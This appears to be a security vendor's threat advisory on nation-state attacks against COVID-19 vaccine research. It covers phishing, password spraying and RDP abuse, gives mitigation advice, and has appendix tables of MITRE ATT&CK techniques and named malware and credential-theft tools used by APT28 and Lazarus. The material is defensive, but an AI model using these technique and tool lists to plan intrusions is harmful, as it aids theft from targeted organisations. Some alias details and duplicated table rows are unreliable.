COVID-19 vaccine R&D under attack by state sponsored actors

Published on November 20, 2020 | 12:30 AM IST

Share this Advisory:

Nation state sponsored actors are reportedly launching cyber offensives against COVID-19 vaccine research facilities across the globe, which are currently in various stages of vaccine development. The threat actors are reported to have had some success in establishing an initial foothold or even exfiltrating research/ other data.

Threat Actor Objectives

The involvement of nation-states in the ongoing cyber offensives can be attributed to the state of the world economy post-COVID-19. This has driven nation-states to compromise or acquire research data from foreign research entities, in a bid to win the ‘vaccine race,’ that will enable the rapid resurgence of their respective economies.

Threat Description

Threat actors are targeting individuals and organisations by direct methods such as password spraying and by employing social engineering methods, such posing as WHO officials and job recruiters, to make the victims open malicious email attachments. They are also launching attacks on Internet-facing assets, by abusing weak RDP credentials, to gain an initial foothold on the target network to further the attack and compromise the target infrastructure.

 

Key Threat Actors

Threat Actor * APT28 – Russia Lazarus – N Korea Cerium – N Korea
Country of Origin Russia North Korea North Korea
APT ID APT 28 APT 38/37 Not yet designated
Alias/ Group

FancyBear, CozyBear,

Strontium, Sofacy

Lazarus Group, Zinc, HiddenCobra Cerium
Attack Vector
  • Initial Entry via password spraying and brute force attacks to compromise valid user accounts
  • RDP credential compromise
  • Spear-phishing with malicious attachments 
  • Phishing campaigns masquerading as job offerings
  • COVID-19 themed attacks
  • Spear phishing posing as WHO officials 
  • Emails laced with malicious attachments 
Category Advanced Persistent Threat (APT)
Target Sectors Pharmaceutical (Vaccine R&D)
Target Regions Canada, France, India, South Korea, United States

MITRE ATT&CK HEAT MAP

  • Russian Group
  • North Korea Groups
  • Common TTPs
MITRE ATT&CK HEAT MAP of COVID-19 attack

Mitigation measures

Mitigations need to be addressed not only by technical means but also by enforcing security policies that implement technical solutions. 

 

Mitigations to offset the risks associated with crucial stages in the cyber kill chain:

Phase Mitigation Type
Initial Access Phase Administrative (Policy)
Payload Staging/ Execution-Installation Technical
Lateral Movement Technical
Exfiltration/Objective Administrative (Policy/ Technical)

 

Initial Access Phase Mitigation

  • Administrative policy to enforce strong passwords: Passwords should contain alphanumerics, special characters, and should not contain dictionary words. 
  • Lockout Policy: To prevent brute-forcing and password spraying.

Payload Staging/ Execution-Installation Mitigation

  • Security administrators should be aware of the “Living-Off-The-Land” approach of the adversaries, which is nothing but using trusted applications on the victim host to do the bidding of the attacker.
  • Effective log monitoring for suspicious activities, for example: abnormal use case of “mshta” and “regsvr32.”
  • Effective IDR/ XDR solutions to monitor host activities.
  • Ingress/ egress traffic flow monitoring.
  • Most of the outlined measures can be implemented with a SIEM.
  • System Configuration auditing.

Lateral Movement Mitigation

  • Proper user privilege auditing, use only standard user accounts
  • Enforcement of “Principle of Least Privilege.”
  • Implementation of Application Allow Listing. 
  • Multi-Factor Authentication.
  • Context-based and adaptive access controls.
  • Strong password policy.
  • Network segmentation and air gaping.
  • Deploy threat behavior model detection solutions like modern IDR/ XDR systems. 
  • Awareness of tools commonly used by actors to execute lateral movement.

 

Exfiltration/Objective Mitigation

  • Effective DLP solutions to monitor border router egress traffic.
  • Awareness of exfiltration techniques used by actors, for example: DNS/ HTTPS
  • Attackers can make use of even trusted applications on the victim environment to exfiltrate data out of the target network (Living off The Land).

 

Basic Incident Response Guidelines 

Guide Body

ISO/IEC 27035

ISO/IEC 27035-1

ISO
SP 800-61 NIST (US)

 

Appendix

APT28

Tactics, Techniques, and Procedures of APT28:

MITRE-ID Description MITRE-ID Description
T1134.001 Access Token Manipulation: Token Impersonation/Theft T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1583.001 Acquire Infrastructure: Domains T1092 Communication Through Removable Media
T1071.003 Application Layer Protocol: Mail Protocols T1213.002 Data from Information Repositories: Sharepoint
T1071.001 Application Layer Protocol: Web Protocols T1005 Data from Local System
T1560 Archive Collected Data T1025 Data from Removable Media
T1119 Automated Collection T1001 Data Obfuscation: Junk Data
T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) T1074.001 Data Staged: Local Data Staging
T1110.003 Brute Force: Password Spraying T1140 Deobfuscate/Decode Files or Information
T1110.001 Brute Force: Password Guessing T1114.002 Email Collection: Remote Email Collection
T1059.001 Command and Scripting Interpreter: PowerShell T1573.001 Encrypted Channel: Symmetric Cryptography
T1546.015 Event-Triggered Execution: Component Object Model Hijacking T1068 Exploitation for Privilege Escalation
T1190 Exploit Public-Facing Application T1210 The exploitation of Remote Services
T1203 Exploitation for Client Execution T1083 File and Directory Discovery
T1211 Exploitation for Defense Evasion T1564.001 Hide Artifacts: Hidden Files and Directories
T1564.003 Hide Artifacts: Hidden Window T1003 OS Credential Dumping
T1070.006 Indicator Removal on Host: Timestamp T1003.001 LSASS Memory
T1070.001 Indicator Removal on Host: Clear Windows Event Logs T1120 Peripheral Device Discovery
T1070.004 Indicator Removal on Host: File Deletion T1566 Phishing: Spear Phishing Link
T1105 Ingress Tool Transfer T1566 Phishing: Spear Phishing Attachment
T1056.001 Input Capture: Keylogging T1542.003 Pre-OS Boot: Bootkit
T1559.002 Inter-Process Communication: Dynamic Data Exchange T1057 Process Discovery
T1498 Network Denial of Service T1090.002 Proxy: External Proxy
T1040 Network Sniffing T1091 Replication Through Removable Media
T1027 Obfuscated Files or Information T1014 Rootkit
T1137.002 Office Application Startup: Office Test T1113 Screen Capture
T1091 Replication Through Removable Media T1218.011 Signed Binary Proxy Execution: Rundll32
T1014 Rootkit T1528 Steal Application Access Token
T1113 Screen Capture T1221 Template Injection
T1218.011 Signed Binary Proxy Execution: Rundll32 T1199 Trusted Relationship
T1528 Steal Application Access Token T1550 Authentication Material: Pass the Hash
T1221 Template Injection T1550 Use Alternate Authentication Material: Application Access Token
T1199 Trusted Relationship T1204.002 User Execution: Malicious File
T1550 Authentication Material: Pass the Hash T1078 Valid Accounts
T1550 Use Alternate Authentication Material: Application Access Token T1204.002 User Execution: Malicious File
T1078 Valid Accounts

Software used by APT28:

MITRE-ID Software MITRE-ID Software
S0045 ADVSTORESHELL S0251 Zebrocy
S0351 Cannon S0250 Koadic
S0160 certutil S0162 Komplex
S0023 CHOPSTICK S0397 LoJax
S0137 CORESHELL S0002 Mimikatz
S0243 DealersChoice S0138 OLDBAIT
S0134 Downdelph S0174 Responder
S0502 Drovorub S0136 USBStealer
S0193 Forfiles S0191 Winexe
S0410 Fysbis S0314 X-Agent for Android
S0135 HIDEDRV S0161 XAgentOSX
S0044 JHUHUGIT S0117 XTunnel

 

Lazarus Group

Tactics, Techniques, and Procedures of Lazarus:

MITRE-ID Description MITRE-ID Description
T1134.002 Access Token Manipulation: Create Process with Token T1059.005 Command and Scripting Interpreter: Visual Basic
T1098 Account Manipulation T1059.001 Command and Scripting Interpreter: PowerShell
T1071.001 Application Layer Protocol: Web Protocols T1543.003 Create or Modify System Process: Windows Service
T1010 Application Window Discovery T1485 Data Destruction
T1560 Archive Collected Data T1132.001 Data Encoding: Standard Encoding
T1560 Archive via Library T1005 Data from Local System
T1560 Archive via Custom Method T1001.003 Data Obfuscation: Protocol Impersonation
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1074.001 Data Staged: Local Data Staging
T1547.009 Boot or Logon Autostart Execution: Shortcut Modification T1491.001 Defacement: Internal Defacement
T1547.005 Boot or Logon Autostart Execution: Security Support Provider T1561.002 Disk Wipe: Disk Structure Wipe
T1110.003 Brute Force: Password Spraying T1561.001 Disk Wipe: Disk Content Wipe
T1059.003 Command and Scripting Interpreter: Windows Command Shell T1189 Drive-by Compromise
T1203 Exploitation for Client Execution T1573.001 Encrypted Channel: Symmetric Cryptography
T1008 Fallback Channels T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
T1083 File and Directory Discovery T1041 Exfiltration Over C2 Channel
T1564.001 Hide Artifacts: Hidden Files and Directories T1562.004 Impair Defenses: Disable or Modify System Firewall
T1562.001 Impair Defenses: Disable or Modify Tools T1070.004 Indicator Removal on Host: File Deletion
T1105 Ingress Tool Transfer T1070.006 Indicator Removal on Host: Timestomp
T1056.001 Input Capture: Keylogging T1112 Modify Registry
T1036.004 Masquerading: Masquerade Task or Service T1571 Non-Standard Port
T1027 Obfuscated Files or Information T1003.001 OS Credential Dumping: LSASS memory
T1027.002 Software Packing T1566.001 Phishing: Spearphishing Attachment
T1566.003 Phishing: Spearphishing via Service T1057 Process Discovery
T1542.003 Pre-OS Boot: Bootkit T1055.001 Process Injection: Dynamic-link Library Injection
T1090.002 Proxy: External Proxy T1021.002 Remote Services: SMB/Windows Admin Shares
T1012 Query Registry T1496 Resource Hijacking
T1021.001 Remote Services: Remote Desktop Protocol T1489 Service Stop
T1218.001 Signed Binary Proxy Execution: Compiled HTML File T1016 System Network Configuration Discovery
T1218.005 Signed Binary Proxy Execution: Mshta T1033 System Owner/User Discovery
T1082 System Information Discovery T1529 System Shutdown/Reboot
T1124 System Time Discovery T1047 Windows Management Instrumentation
T1204.002 User Execution: Malicious File

 

Software used by Lazarus:

MITRE-ID Software MITRE-ID Software
S0347 AuditCred S0108 netsh
S0245 BADCALL S0238 Proxysvc
S0239 Bankshot S0241 RATANKBA
S0498 Cryptoistic S0364 RawDisk
S0497 Dacls S0263 TYPEFRAME
S0181 FALLCHILL S0180 Volgmer
S0246 HARDRAIN S0366 WannaCry
S0376 HOPLIGHT S0271 KEYMARBLE
S0431 HotCroissant S0002 Mimikatz

Be informed in your Inbox

Sign up now to our Threat intelligence Newsletter and be the first to know about threats first in your inbox.

Join the Discussions

Discuss your way into our Community about these threats and stay Vigilant and informed.